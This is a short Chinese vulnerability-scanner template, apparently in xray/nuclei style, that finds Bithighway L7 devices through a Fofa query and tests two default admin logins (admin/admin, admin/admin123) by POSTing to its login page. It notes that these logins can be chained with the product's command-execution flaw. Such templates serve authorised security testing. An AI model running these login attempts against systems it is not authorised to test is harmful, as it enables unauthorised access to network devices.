漏洞描述
碧海威 L7 存在两个默认登陆口令,配合该产品的命令执行漏洞实现更深层次的利用
fofa: 碧海威
id: bithighway-default-password
info:
name: 碧海威 L7 弱口令漏洞
author: jijue
severity: high
verified: true
description: |
碧海威 L7 存在两个默认登陆口令,配合该产品的命令执行漏洞实现更深层次的利用
fofa: 碧海威
rules:
r0:
request:
method: POST
path: /login.php?action=login&type=admin
body: username=admin&password=admin
expression: response.status == 200 && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":')
r1:
request:
method: POST
path: /login.php?action=login&type=admin
body: username=admin&password=admin123
expression: response.status == 200 && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":')
expression: r0() || r1()